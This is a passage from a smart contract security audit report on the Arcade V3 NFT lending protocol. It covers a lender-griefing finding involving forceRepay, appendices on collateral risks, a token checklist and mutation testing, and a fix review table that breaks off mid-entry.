At any time after the loan is initiated (and, if the loan is past its due date, before the lender claims the collateral), the borrower has to pay back their full debt in order to recover their assets. To do so, there are two functions in RepaymentController: repay and forceRepay. The difference between them is that the latter transfers the tokens to the LoanCore contract instead of directly to the lender; it is meant to allow the borrower to settle their obligations when the lender cannot receive tokens for any reason. For the lender to get their tokens back in this scenario, they must call the redeemNote function in RepaymentController, which in turn calls LoanCore.redeemNote, which transfers the tokens to an address set by the lender in the call.

Because the borrower is free to decide which function to call to repay their debt, they can arbitrarily decide to do so via forceRepay, obligating the lender to send a transaction (with its associated gas fees) to recover their tokens. Additionally, depending on the configuration of the protocol, the lender may have to pay an additional fee (LENDER_REDEEM_FEE) to get back their own tokens, cutting into their profits with no chance to opt out.

function redeemNote(uint256 loanId, address to) external override {
    LoanLibrary.LoanData memory data = loanCore.getLoan(loanId);
    (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId);

    if (data.state != LoanLibrary.LoanState.Repaid) revert RC_InvalidState(data.state);

    address lender = lenderNote.ownerOf(loanId);
    if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender);

    uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / BASIS_POINTS_DENOMINATOR;

    loanCore.redeemNote(loanId, redeemFee, to);
}

Figure 16.1: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol

Note that, from the perspective of the borrower, it is actually cheaper to call forceRepay than repay because of the gas saved by not transferring the tokens to the lender and not burning one of the promissory notes.

Exploit Scenario
Bob has to pay back his loan, and he decides to do so via forceRepay to save gas. Lucy, the lender, wants her tokens back and is now forced to call redeemNote to get them. In this transaction, she pays the gas fees that the borrower would otherwise have paid to send the tokens directly to her, and she has to pay an additional fee (LENDER_REDEEM_FEE), causing her to receive less value from the loan than she originally expected.

Recommendations
Short term, remove the incentive (the lower gas cost) for the borrower to call forceRepay instead of repay. Consider taking one of the following actions:
● Force the lender to always pull their funds using the redeemNote function. This can be achieved by removing the repay function and requiring the borrower to call forceRepay.
● Remove the forceRepay function and modify the repay function so that it transfers the funds to the lender in a try/catch statement and creates a redeem note (which the lender can exchange for their funds using the redeemNote function) only if that transfer fails (see the sketch after this list).
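A minimal sketch of the second option follows; the helper names (_closeLoan, _createRedeemNote) and surrounding plumbing are hypothetical, it assumes OpenZeppelin's SafeERC20 is in scope, and a production version would also need to handle non-standard ERC-20 return values:

function repay(uint256 loanId) external {
    (uint256 amountFromBorrower, uint256 amountToLender) = _prepareRepay(loanId);
    address lender = lenderNote.ownerOf(loanId);
    IERC20 token = IERC20(loanCore.getLoan(loanId).terms.payableCurrency);

    token.safeTransferFrom(msg.sender, address(this), amountFromBorrower);

    // Pay the lender directly when possible so that honest lenders incur
    // no extra transaction; fall back to a redeem note only on failure.
    try token.transfer(lender, amountToLender) returns (bool ok) {
        if (ok) {
            _closeLoan(loanId);
            return;
        }
    } catch {}

    _createRedeemNote(loanId, amountToLender);
    _closeLoan(loanId);
}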
Long term, when designing a smart contract protocol, always consider the incentives for each party to perform actions in the protocol, and avoid making an actor pay for the mistakes or maliciousness of others. By thoroughly documenting the incentive structure, flaws can be spotted and mitigated before the protocol goes live.

A. Vulnerability Categories
The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.

Vulnerability Categories
Access Controls: Insufficient authorization or assessment of rights
Auditing and Logging: Insufficient auditing of actions or logging of problems
Authentication: Improper identification of users
Configuration: Misconfigured servers, devices, or software components
Cryptography: A breach of system confidentiality or integrity
Data Exposure: Exposure of sensitive information
Data Validation: Improper reliance on the structure or values of data
Denial of Service: A system failure with an availability impact
Error Reporting: Insecure or insufficient reporting of error conditions
Patching: Use of an outdated software package or library
Session Management: Improper identification of authenticated users
Testing: Insufficient test methodology or test coverage
Timing: Race conditions or other order-of-operations flaws
Undefined Behavior: Undefined behavior triggered within the system

Severity Levels
Informational: The issue does not pose an immediate risk but is relevant to security best practices.
Undetermined: The extent of the risk was not determined during this engagement.
Low: The risk is small or is not one the client has indicated is important.
Medium: User information is at risk; exploitation could pose reputational, legal, or moderate financial risks.
High: The flaw could affect numerous users and have serious reputational, legal, or financial implications.

Difficulty Levels
Undetermined: The difficulty of exploitation was not determined during this engagement.
Low: The flaw is well known; public tools for its exploitation exist or can be scripted.
Medium: An attacker must write an exploit or will need in-depth knowledge of the system.
High: An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue.

B. Code Maturity Categories
The following tables describe the code maturity categories and rating criteria used in this document.
Code Maturity Categories
Arithmetic: The proper use of mathematical operations and semantics
Auditing: The use of event auditing and logging to support monitoring
Authentication / Access Controls: The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system
Complexity Management: The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions
Decentralization: The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades
Documentation: The presence of comprehensive and readable codebase documentation
Transaction Ordering Risks: The system's resistance to front-running attacks
Low-Level Manipulation: The justified use of inline assembly and low-level calls
Testing and Verification: The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage

Rating Criteria
Strong: No issues were found, and the system exceeds industry standards.
Satisfactory: Minor issues were found, but the system is compliant with best practices.
Moderate: Some issues that may affect system safety were found.
Weak: Many issues that affect system safety were found.
Missing: A required component is missing, significantly affecting system safety.
Not Applicable: The category is not applicable to this review.
Not Considered: The category was not considered in this review.
Further Investigation Required: Further investigation is required to reach a meaningful conclusion.

C. Code Quality Recommendations
The following recommendations are not associated with specific vulnerabilities. However, they enhance code readability and may prevent the introduction of vulnerabilities in the future.

● Make fee names more explicit and add getters for each fee. The names used for the various fee values (e.g., FL_0x) do not clearly describe the fees. Readers of the code have to navigate between the current contract and the FeeLookups contract to determine the type of each fee. Additionally, adding custom getter functions to the FeeController contract (e.g., getLenderFee()) can simplify the system by allowing FeeLookups to be removed from the inheritance chain of the OriginationController, RepaymentController, and VaultFactory contracts.

● Ensure that verifiers follow the provided documentation. According to the _runPredicatesCheck() NatSpec documentation, the function reverts if a verifier returns false. However, some of the implemented verifiers can return true or false or instead revert. Even though this discrepancy has no direct impact on the system, an external entity interacting with Arcade may be confused by getting an IV_xxx error when they expected an OC_PredicateFailed error.

● Ensure that structure names are unique throughout the system. There are two structures named SignatureItem: one in ArtBlocksVerifier and the other in ItemsVerifier. Even though they are defined in different namespaces, it can be confusing to tell them apart because they have different members. Moreover, in the provided test suite, they are referred to as ArtBlocksItem and SignatureItem, respectively, making it more confusing for readers.

● Use automatically generated getters for public variables.
OriginationController defines the mappings allowedVerifiers, allowedCurrencies, and allowedCollateral as public. The Solidity compiler automatically adds getters for these variables, but the team added manual getters (isAllowedVerifier, isAllowedCurrency, and isAllowedCollateral) that provide no functionality beyond the default getters (see the sketch after this list).

● Ensure that comments in the code reflect the code's intended behavior. Here are two examples of off-by-one comments in OriginationController: OriginationController.sol#L669 and OriginationController.sol#L673.

● Ensure that contract names match their filenames. The verifiers/ItemsVerifier.sol file contains the ArcadeItemsVerifier contract.

● Remove variables that are never used or are used only once. For example, id in ArcadeItemsVerifier.verifyPredicates() is used only once in the function body.

● Avoid redefining constants. FL_01 in FeeLookups was redefined in VaultFactory.

● Remove unneeded or unreachable code. For example, the else condition in the ArcadeItemsVerifier.verifyPredicates function can never be reached because abi.decode will revert for incorrect CollateralType enum values.
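Regarding the getters item above, a short sketch of the duplication (assuming a bool mapping; the generated getter signature is standard Solidity behavior):

mapping(address => bool) public allowedVerifiers;
// The compiler already generates an external view getter with signature
// allowedVerifiers(address) returns (bool), so a manual wrapper such as
// function isAllowedVerifier(address verifier) external view returns (bool) {
//     return allowedVerifiers[verifier];
// }
// adds no functionality beyond the default getter.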
D. Risks with Approving NFTs for Use as Collateral
The Arcade protocol aims to whitelist NFT contracts to be used as collateral to back loans. These NFTs could introduce problems that could allow attackers to steal funds or otherwise impede the correct functioning of the system. We recommend that the Arcade team exercise caution in approving NFTs for use as collateral to ensure that the system keeps working correctly and that no user loses access to funds. Follow these guidelines when considering which NFTs to approve:

● Tokens should never be upgradeable. Upgradeable ERC-721 tokens can introduce substantial risks when used as collateral in an NFT lending protocol. Therefore, smart contract developers should either prevent upgradeable tokens from being used as collateral or implement robust safeguards against the associated risks. Some of these risks include the following:
○ Unpredictable token logic changes: Because the contract owner or a designated admin can alter the logic of an upgradeable token, the token's behavior could change unpredictably during the loan period. This could affect the value of the collateral, render it worthless, or prevent its return.
○ Centralization and minimized trust: Upgradeable contracts introduce an element of centralization, as the power to upgrade the contract typically lies with a specific address or addresses. This could be a risk in a decentralized environment, where the ethos is to minimize trust in individual parties. The contract's owner could, maliciously or unintentionally, make an upgrade that jeopardizes the token's role as collateral.
○ Complexity and potential bugs: Upgradeable contracts are more complex than their non-upgradeable counterparts. This added complexity increases the risk of bugs and vulnerabilities, which could be exploited to the detriment of Arcade's lending protocol and its users.

● Tokens should not have a self-destruct capability. The self-destruct function allows a contract to be destroyed by its owner, which essentially removes the contract's bytecode from the Ethereum blockchain, making it nonfunctional. Here are some of the risks of using self-destructible tokens as collateral:
○ Total loss of collateral: If an ERC-721 token used as collateral has a self-destruct function and that function is invoked during the loan's lifecycle, the token will be rendered worthless. The borrower could default on their loan, and the lender would not be able to claim the collateral, leading to a complete loss.
○ Damage to the integrity of Arcade's lending protocol: Such tokens can undermine the integrity of the lending protocol. Lenders will be unwilling to participate if they believe that the collateral could self-destruct, making it harder for the protocol to attract and retain users.
○ Lack of recourse: In traditional finance, there are legal protections to prevent the destruction of assets used as collateral. In contrast, in the blockchain world, there is no way to recover a contract once it has self-destructed, making such tokens a significant risk for lenders.

● Tokens should not be pausable. A "pause" function, when present in a smart contract, allows certain privileged accounts, such as contract owners and administrators, to stop specific activities, such as token transfers, for a period of time. Although this functionality can be useful for halting activities in case of a detected vulnerability or bug, it can pose significant risks to an NFT lending protocol, such as the following:
○ Possible prevention of repayment and collateral retrieval: If a token used as collateral is paused, that token cannot be transferred. This means that a borrower could not repay their loan and retrieve their collateral, and similarly, a lender could not claim the collateral if the loan defaults.
○ Market manipulation: In a worst-case scenario, a malicious token owner could strategically pause and unpause a token, disrupting the market and possibly manipulating the token's value.

● Tokens should not be burnable by an authorized third party. Tokens that can be burned by a third party or token admin should not be permitted as collateral in an NFT lending protocol. "Burning" is a process by which tokens are permanently removed from circulation, thereby reducing the total supply of tokens. Although this feature can be useful in certain contexts, it can introduce the following risks when used in an NFT lending protocol:
○ Total loss of collateral: If the token used as collateral can be burned by an admin or third party, it could be burned during the duration of the loan, which would leave the lender unprotected in the case of a default.
○ Loan-to-value manipulation: Those with the ability to burn tokens could engage in manipulative behaviors that disrupt the loan-to-value ratio, such as artificially influencing a token's scarcity and thereby its market value, leading to over-collateralization or under-collateralization.

● Tokens should not hold or have access to other assets. Tokens can be structured to hold or interact with other assets on the blockchain. An ERC-721 token can be a "wrapper" for specific ERC-20 tokens, generate yields from a DeFi protocol, or represent in-game characters with their own assets. Using such tokens as collateral in a lending protocol comes with the following risks:
○ Value fluctuation: If the token holds or has access to other assets, its value can change during the loan period if the value of the underlying assets changes.
If the collateral's value changes, it may no longer cover the value of the loan, creating significant risk for the lender.
○ Asset removal or addition: If the token allows assets to be added to or removed from it, the value of the collateral could be altered during the life cycle of the loan. A borrower or a third party could remove assets from the collateral, decreasing the collateral's value; the lender and the protocol would have no means to prevent this.
○ Valuation complexity: Valuing tokens that hold other assets is more complex than valuing simpler tokens. Some assets are interest bearing, some undergo rebasing, and most are traded on public markets. The complexity involved in accurately determining the value of such tokens introduces additional risks for the lender, the borrower, and the protocol in general.

● Gaming tokens with alterable intrinsic value should be avoided. Tokens are often used to represent unique digital assets in gaming environments, such as characters, equipment, and virtual real estate. Using them as collateral in a lending protocol carries some risks, such as the following:
○ Developer control: Game developers often maintain a degree of control over in-game assets, which may include the ability to create, modify, or destroy assets. If a game developer decides to flood the market with copies of a previously rare asset, or to alter its capabilities within the game, the value of the collateral could be significantly affected.
○ In-game rules and actions: In-game actions by other players or changes to in-game rules can influence the value of the token. For instance, if the game involves player competition, other players' actions could diminish the value of the collateral token.

E. Token Integration Checklist
The following checklist provides recommendations for interactions with arbitrary tokens. Every unchecked item should be justified, and its associated risks understood. For an up-to-date version of the checklist, see crytic/building-secure-contracts.

For convenience, all Slither utilities can be run directly on a token address, such as the following:

slither-check-erc 0xdac17f958d2ee523a2206206994597c13d831ec7 TetherToken --erc erc20
slither-check-erc 0x06012c8cf97BEaD5deAe237070F9587f8E7A266d KittyCore --erc erc721

To follow this checklist, use the output from the following Slither commands for the token:

slither-check-erc [target] [contractName] [optional: --erc ERC_NUMBER]
slither [target] --print human-summary
slither [target] --print contract-summary
slither-prop . --contract ContractName # requires configuration and the use of Echidna and Manticore

General Considerations
❏ The contract has a security review. Avoid interacting with contracts that lack a security review. Check the length of the assessment (i.e., the level of effort), the reputation of the security firm, and the number and severity of the findings.
❏ You have contacted the developers. You may need to alert their team to an incident. Look for appropriate contacts on blockchain-security-contacts.
❏ They have a security mailing list for critical announcements. Their team should advise users (like you!) when critical issues are found or when upgrades occur.

Contract Composition
❏ The contract avoids unnecessary complexity. The token should be a simple contract; a token with complex code requires a higher standard of review. Use Slither's human-summary printer to identify complex code.
❏ The contract uses SafeMath.
Contracts that do not use SafeMath require a higher standard of review. Inspect the contract by hand for SafeMath usage.
❏ The contract has only a few non-token-related functions. Non-token-related functions increase the likelihood of an issue in the contract. Use Slither's contract-summary printer to broadly review the code used in the contract.
❏ The token has only one address. Tokens with multiple entry points for balance updates can break internal bookkeeping based on the address (e.g., balances[token_address][msg.sender] may not reflect the actual balance).

Owner Privileges
❏ The token is not upgradeable. Upgradeable contracts may change their rules over time. Use Slither's human-summary printer to determine whether the contract is upgradeable.
❏ The owner has limited minting capabilities. Malicious or compromised owners can abuse minting capabilities. Use Slither's human-summary printer to review minting capabilities, and consider manually reviewing the code.
❏ The token is not pausable. Malicious or compromised owners can trap contracts relying on pausable tokens. Identify pausable code by hand.
❏ The owner cannot blacklist the contract. Malicious or compromised owners can trap contracts relying on tokens with a blacklist. Identify blacklisting features by hand.
❏ The team behind the token is known and can be held responsible for abuse. Contracts with anonymous development teams or teams that reside in legal shelters require a higher standard of review.

ERC20 Tokens

ERC20 Conformity Checks
Slither includes a utility, slither-check-erc, that reviews the conformance of a token to many related ERC standards. Use slither-check-erc to review the following:
❏ Transfer and transferFrom return a boolean. Several tokens do not return a boolean on these functions. As a result, their calls in the contract might fail.
❏ The name, decimals, and symbol functions are present if used. These functions are optional in the ERC20 standard and may not be present.
❏ Decimals returns a uint8. Several tokens incorrectly return a uint256. In such cases, ensure that the value returned is below 255.
❏ The token mitigates the known ERC20 race condition. The ERC20 standard has a known race condition around approve that must be mitigated to prevent attackers from stealing tokens (see the sketch after this list).

Slither includes a utility, slither-prop, that generates unit tests and security properties that can discover many common ERC flaws. Use slither-prop to review the following:
❏ The contract passes all unit tests and security properties from slither-prop. Run the generated unit tests and then check the properties with Echidna and Manticore.
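To illustrate the race-condition item above: if a holder lowers an existing approval with a raw approve call, the spender can front-run it and spend both the old and the new allowance. The usual mitigation is OpenZeppelin-style relative allowance adjustment (a sketch of a token implementation, not code from the audited system):

// Instead of approve(spender, newValue), adjust the allowance relatively,
// so a front-running spender cannot combine the old and new values.
function increaseAllowance(address spender, uint256 addedValue) public returns (bool) {
    _approve(msg.sender, spender, _allowances[msg.sender][spender] + addedValue);
    return true;
}

function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) {
    uint256 current = _allowances[msg.sender][spender];
    require(current >= subtractedValue, "ERC20: decreased allowance below zero");
    _approve(msg.sender, spender, current - subtractedValue);
    return true;
}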
Risks of ERC20 Extensions
The behavior of certain contracts may differ from the original ERC specification. Conduct a manual review of the following conditions:
❏ The token is not an ERC777 token and has no external function call in transfer or transferFrom. External calls in the transfer functions can lead to reentrancies.
❏ Transfer and transferFrom should not take a fee. Deflationary tokens can lead to unexpected behavior.
❏ Potential interest earned from the token is taken into account. Some tokens distribute interest to token holders. This interest may be trapped in the contract if not taken into account.

Token Scarcity
Reviews of token scarcity issues must be executed manually. Check for the following conditions:
❏ The supply is owned by more than a few users. If a few users own most of the tokens, they can influence operations based on the tokens' repartition.
❏ The total supply is sufficient. Tokens with a low total supply can be easily manipulated.
❏ The tokens are located on more than a few exchanges. If all the tokens are on one exchange, a compromise of the exchange could compromise the contract relying on the token.
❏ Users understand the risks associated with large amounts of funds or flash loans. Contracts relying on the token balance must account for attackers with large amounts of funds or attacks executed through flash loans.
❏ The token does not allow flash minting. Flash minting can lead to substantial swings in the balance and the total supply, which necessitate strict and comprehensive overflow checks in the operation of the token.

ERC721 Tokens

ERC721 Conformity Checks
The behavior of certain contracts may differ from the original ERC specification. Conduct a manual review of the following conditions:
❏ Transfers of tokens to the 0x0 address revert. Several tokens allow transfers to 0x0 and consider tokens transferred to that address to have been burned; however, the ERC721 standard requires that such transfers revert.
❏ safeTransferFrom functions are implemented with the correct signature. Several token contracts do not implement these functions. A transfer of NFTs to one of those contracts can result in a loss of assets.
❏ The name, decimals, and symbol functions are present if used. These functions are optional in the ERC721 standard and may not be present.
❏ If it is used, the decimals function returns a uint8(0). Other values are invalid.
❏ The name and symbol functions can return an empty string. This behavior is allowed by the standard.
❏ The ownerOf function reverts if the tokenId is invalid or refers to a token that has already been burned. The function cannot return 0x0. This behavior is required by the standard, but it is not always properly implemented.
❏ A transfer of an NFT clears its approvals. This is required by the standard.
❏ The token ID of an NFT cannot be changed during its lifetime. This is required by the standard.

Common Risks of the ERC721 Standard
To mitigate the risks associated with ERC721 contracts, conduct a manual review of the following conditions:
❏ The onERC721Received callback is taken into account. External calls in the transfer functions can lead to reentrancies, especially when the callback is not explicit (e.g., in safeMint calls).
❏ When an NFT is minted, it is safely transferred to a smart contract. If there is a minting function, it should behave similarly to safeTransferFrom and properly handle the minting of new tokens to a smart contract. This will prevent a loss of assets.
❏ The burning of a token clears its approvals. If there is a burning function, it should clear the token's previous approvals.

F. Mutation Testing
The goal of mutation testing is to gain insight into a codebase's test coverage. Mutation tests go line by line through the target file, mutate the given line in some way, run the tests, and flag changes that do not trigger test failures. Depending on the complexity of the logic in any given line and the tool used to mutate it, mutation tests could produce upwards of 50 mutants per line of source code.
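For instance, a single comparison can spawn many mutants, most of which a thorough test suite should kill (an invented Solidity example, not taken from the Arcade codebase):

// original line
if (amount > balance) revert InsufficientBalance();

// a few of the mutants a tool might generate from it
if (amount >= balance) revert InsufficientBalance();  // boundary change
if (amount < balance) revert InsufficientBalance();   // operator negation
// if (amount > balance) revert InsufficientBalance(); // statement deletion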
Mutation testing is a slow process, but by highlighting areas of the code with incomplete test coverage, it allows auditors to focus their manual review on the parts of the code that are most likely to contain latent bugs. In this section, we provide information on available mutation testing tools that could be used on the Arcade V3 codebase, and we describe the mutation testing campaign that we conducted during this audit.

The following mutation testing tools are available:
● Universalmutator: This tool generates deterministic mutants from regular expressions; it supports many source code languages, including Solidity and Vyper. Refer to the 2018 ICSE paper on the tool and the guest blog post about the tool on the Trail of Bits blog for more information.
● Necessist: This tool was developed in-house by Trail of Bits. It operates on tests rather than source code, although it has a similar end goal. Necessist could provide a nice complement to source-focused mutation testing. Due to the time-boxed nature of this review, we deprioritized the use of Necessist to conduct an additional mutation testing campaign.
● Vertigo: This tool was developed by security researchers at Consensys Diligence. Integration with Foundry is planned, but the current progress on that work is unclear. Known scalability issues are present in the tool.
● Gambit: This tool generates stochastic mutants by modifying the Solidity AST. It is optimized for integration with the Certora prover.

We used universalmutator to conduct a mutation testing campaign during this engagement because the mutants it generates are deterministic and because it is a relatively mature tool with few known issues. The tool can be installed with the following command:

pip install universalmutator

Figure F.1: The command used to install universalmutator

Once installed, a mutation campaign can be run against all Solidity source files using the following bash script:

 1   find contracts \
 2     -name '*.sol' \
 3     -not -path '*/interfaces/*' \
 4     -not -path '*/test/*' \
 5     -not -path '*/external/*' \
 6     -print0 | while IFS= read -r -d '' file
 7   do
 8     name="$(basename "$file" .sol)"
 9     dir="mutants/$name"
10     mkdir -p "$dir"
11     echo "Mutating $file"
12     mutate "$file" \
13       --cmd "timeout 200s npx hardhat test" \
14       --mutantDir "$dir" \
15       > "mutants/$name.log"
16   done

Figure F.2: A bash script that runs a mutation testing campaign against each Solidity file in the contracts directory

Consider the following notes about the above bash script:
● The overall runtime of the script against all non-excluded Solidity files in the target contracts repository is approximately one week on a modern M2 Mac. This execution time is directly related to the npx hardhat test runtime and the number of contracts to be mutated.
● The --cmd argument on line 13 specifies the command to run for each mutant. This command is prefixed by timeout 200s (timeout is a tool included in the coreutils package on macOS) because a healthy run of the test suite was measured to take approximately 150 seconds. A timeout longer than the average test suite runtime is used only to cut off test runs that are badly stalled.

The results of each target's mutation tests are saved in a file, per line 15 of the script in figure F.2. An illustrative example of such output is shown in figure F.3.

*** UNIVERSALMUTATOR ***
MUTATING WITH RULES: audit-arcade/custom-solidity.rules
FAILED TO FIND RULE audit-arcade/custom-solidity.rules AS BUILT-IN...
SKIPPED 458 MUTANTS ONLY CHANGING STRING LITERALS
2761 MUTANTS GENERATED BY RULES
...
PROCESSING MUTANT: 121: if (_feeController == address(0)) revert OC_ZeroAddress(); ==>
  if (_feeController <= address(0)) revert OC_ZeroAddress();...INVALID
PROCESSING MUTANT: 121: if (_feeController == address(0)) revert OC_ZeroAddress(); ==>
  if (_feeController != address(0)) revert OC_ZeroAddress();...VALID
  [written to mutants/OriginationController/OriginationController.mutant.25.sol]
PROCESSING MUTANT: 121: if (_feeController == address(0)) revert OC_ZeroAddress(); ==>
  if (_feeController >= address(0)) revert OC_ZeroAddress();...INVALID
...
PROCESSING MUTANT: 375: ) public override returns (uint256 newLoanId) { ==>
  ) public override returns (uint256 newLoanId)...INVALID
PROCESSING MUTANT: 375: _validateLoanTerms(loanTerms); ==>
  /*_validateLoanTerms(loanTerms);*/...VALID
  [written to mutants/OriginationController/OriginationController.mutant.46.sol]
PROCESSING MUTANT: 375: _validateLoanTerms(loanTerms); ==> selfdestruct(msg.sender);...INVALID
PROCESSING MUTANT: 375: _validateLoanTerms(loanTerms); ==> revert();...INVALID
...
156 VALID MUTANTS
2605 INVALID MUTANTS
0 REDUNDANT MUTANTS
Valid Percentage: 5.650126765664615%

Figure F.3: Abbreviated output from the mutation testing campaign on OriginationController.sol

The output of universalmutator starts with the number of mutants generated and ends with a summary of how many of these mutants are valid. A small percentage of valid mutants indicates thorough test coverage.

The first highlighted snippet in the middle of the output is focused on mutations made to line 121 of the OriginationController source code. This particular line shows a mutation with a false positive: although the mutant compiles and passes all tests, it does not imply a failure in test coverage because an address cannot be negative. Other common types of false positives include removing the public visibility modifier from variable or function declarations.

However, the second highlighted snippet shows that commenting out line 375 of the OriginationController source code makes the test run succeed. Because this change can have consequences for the results of the function, this mutant should be invalid given thorough test coverage. In this particular case, it means that none of the implemented tests for the OriginationController contract tries to roll over a loan with invalid loan terms. For auditors, this is a cue to take an extra close look at the implementation of this method and at its use throughout the rest of the codebase.

We recommend running mutation tests every time major changes are made to the code or to the test suite, and filtering the results to ensure that the test coverage is correct.

G. Incident Response Plan Recommendations
This section provides recommendations on formulating an incident response plan.
● Identify the parties (either specific people or roles) responsible for implementing the mitigations when an issue occurs (e.g., deploying smart contracts, pausing contracts, upgrading the front end, etc.).
● Clearly describe the intended contract deployment process.
● Outline the circumstances under which the Arcade protocol will compensate users affected by an issue (if any).
○ Issues that warrant compensation could include an individual or aggregate loss or a loss resulting from user error, a contract flaw, or a third-party contract flaw.
● Document how the team plans to stay up to date on new issues that could affect the system; awareness of such issues will inform future development work and help the team secure the deployment toolchain and the external on-chain and off-chain services that the system relies on.
○ Identify sources of vulnerability news for each language and component used in the system, and subscribe to updates from each source. Consider creating a private Discord channel in which a bot will post the latest vulnerability news; this will provide the team with a way to track all updates in one place. Lastly, consider assigning certain team members to track news about vulnerabilities in specific components of the system.
● Determine when the team will seek assistance from external parties (e.g., auditors, affected users, other protocol developers, etc.) and how it will onboard them.
○ Effective remediation of certain issues may require collaboration with external parties.
● Define contract behavior that would be considered abnormal by off-chain monitoring solutions.

It is best practice to perform periodic dry runs of scenarios outlined in the incident response plan to find omissions and opportunities for improvement and to develop "muscle memory." Additionally, document the frequency with which the team should perform dry runs of various scenarios, and perform dry runs of more likely scenarios more regularly. Create a template to be filled out with descriptions of any necessary improvements after each dry run.

H. Fix Review Results
When undertaking a fix review, Trail of Bits reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not a comprehensive analysis of the system.

From July 24 to July 25, 2023, Trail of Bits reviewed the fixes and mitigations implemented by the Arcade team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, of the 16 issues described in this report, Arcade has resolved 12 issues and has not resolved the remaining four. For additional information, please see the Detailed Fix Review Results below.
ID | Title | Severity | Status
1 | Different zero-address errors thrown by single and batch NFT withdrawal functions | Informational | Resolved
2 | Solidity compiler optimizations can be problematic | Undetermined | Unresolved
3 | callApprove does not follow approval best practices | Informational | Resolved
4 | Risk of confusing events due to missing checks in whitelist contracts | Low | Resolved
5 | Missing checks of _exists() return value | Informational | Resolved
6 | Incorrect deployers in integration tests | Informational | Resolved
7 | Risk of out-of-gas revert due to use of transfer() in claimFees | Informational | Resolved
8 | Risk of lost funds due to lack of zero-address check in functions | Medium | Resolved
9 | The maximum value for FL_09 is not set by FeeController | Low | Resolved
10 | Fees can be changed while a loan is active | Low | Resolved
11 | Asset vault nesting can lead to loss of assets | Low | Unresolved
12 | Risk of locked assets due to use of _mint instead of _safeMint | Medium | Resolved
13 | Borrowers cannot realize full loan value without risking default | Medium | Resolved
14 | itemPredicates encoded incorrectly according to EIP-712 | Low | Resolved
15 | The fee values can distort the incentives for the borrowers and lenders | Informational | Unresolved
16 | Malicious borrowers can use forceRepay to grief lenders | Medium | Unresolved

Detailed Fix Review Results

TOB-ARCADE-1: Different zero-address errors thrown by single and batch NFT withdrawal functions
Resolved in commits 00e8130 and 8542c46. The AV_ZeroAddress error was updated to include a string addressType argument that is used to indicate which address parameter violated a zero-address check requirement. Additional zero-address checks were added to functions in the AssetVault contract, unit tests were implemented to ensure that these checks work as expected, and the NatSpec comments were updated to reflect this update.

TOB-ARCADE-2: Solidity compiler optimizations can be problematic
Unresolved. Arcade provided the following statement about this issue:
The Arcade team understands that Solidity compiler optimizations may potentially be problematic. However, to remove our compiler optimization we would need to downsize four of our smart contracts in extensive ways, breaking them up into smaller contracts and considerably increasing our code footprint, introducing more complexity and possibly new risks. We elected not to do this at this time, given that the existence of a vulnerability remains undetermined. Before the next major protocol release, the Arcade team will revisit this issue.

TOB-ARCADE-3: callApprove does not follow approval best practices
Resolved in commits a3ce932 and 77c1db0. The AssetVault contract now includes two new functions, callIncreaseAllowance and callDecreaseAllowance, which enable safe interactions with Arcade for third-party integrations. The callApprove function was temporarily removed in commit a3ce932 but was subsequently added back in commit 77c1db0. To aid third-party integrators and test the expected functionality of the newly added functions, documentation and unit tests have been added appropriately.

TOB-ARCADE-4: Risk of confusing events due to missing checks in whitelist contracts
Resolved in commit 2434705. Two new error types, CW_AlreadyWhitelisted and CW_NotWhitelisted, have been added and implemented for the whitelisting functions. If the address has already been added or the address targeted for removal is not found, the whitelisting functions will now revert.
NatSpec comments have been added to describe each error, and unit tests have been included to test the add and remove functions for the expected revert.

TOB-ARCADE-5: Missing checks of _exists() return value
Resolved in commit e04502b. New reasons for DoesNotExist reverts were added to the Lending and Vault contracts. The VaultFactory and PromissoryNote contracts now use these revert reasons in the tokenURI functions when the requested tokenId is nonexistent. Additionally, new tests were implemented for VaultFactory and PromissoryNote that check for the expected revert reason when a nonexistent tokenId is used.

TOB-ARCADE-6: Incorrect deployers in integration tests
Resolved in commit dddc905. The incorrect deployers in integration test cases were changed from signers[0] to admin. A new test was implemented to check that the correct permissions are set when the protocol is deployed.

TOB-ARCADE-7: Risk of out-of-gas revert due to use of transfer() in claimFees
Resolved in commit a948cfc. Comments were added to inform users and developers about the issue, but no further changes were made to the contract.

TOB-ARCADE-8: Risk of lost funds due to lack of zero-address check in functions
Resolved in commit a6dbd53. Existing error types related to ZeroAddress were modified to include a string parameter indicating the address that failed the zero-address check (also refer to the fix status for issue TOB-ARCADE-1). The uses of the old error type with no arguments were replaced with the new version. New zero-address checks for the token and destination addresses were implemented in the LoanCore.withdraw and LoanCore.withdrawProtocolFees functions. Checks for the destination address were added to the RepaymentController.redeemNote and VaultFactory.claimFees functions. Existing tests were modified to account for the new string parameter in error types, and new tests were implemented for zero-address parameters in the fixed functions.

TOB-ARCADE-9: The maximum value for FL_09 is not set by FeeController
Resolved in commit a51dfd8. The value of maxFees[FL_09] is now set properly in the constructor of the FeeController contract. The unit test suite has also been expanded to include tests that ensure that all maximum fee values are properly set.

TOB-ARCADE-10: Fees can be changed while a loan is active
Resolved in commit f7b87a7. The fix implemented for this issue consists of several parts. First, the fee names were changed. Previously, the FeeLookups constants ranged from FL_01 to FL_09, where FL_01 was the vault minting fee and FL_02 through FL_09 were the different fees that borrowers and lenders pay for a loan. The Arcade team renamed FL_02 through FL_09 to FL_01 through FL_08, removed the former FL_01 from FeeLookups, and replaced it with vaultMintFee in FeeController. The functions for setting and getting the fees were renamed to setLendingFee and getLendingFee, respectively. The new getFeesOrigination and getFeesRollover functions were added to simplify the process of retrieving the fees for the loan origination and rollover processes.

A new FeeSnapshot structure was created to take a snapshot of the fee values at the moment a loan is originated, ensuring that future changes to fees do not affect existing loans. However, only the values for the default, interest, and principal fees (fees FL_05 through FL_07) are stored; the redeem fee (FL_08) is read from feeController at the moment of redeeming.
TOB-ARCADE-11: Asset vault nesting can lead to loss of assets
Unresolved. Arcade provided the following statement about this issue:

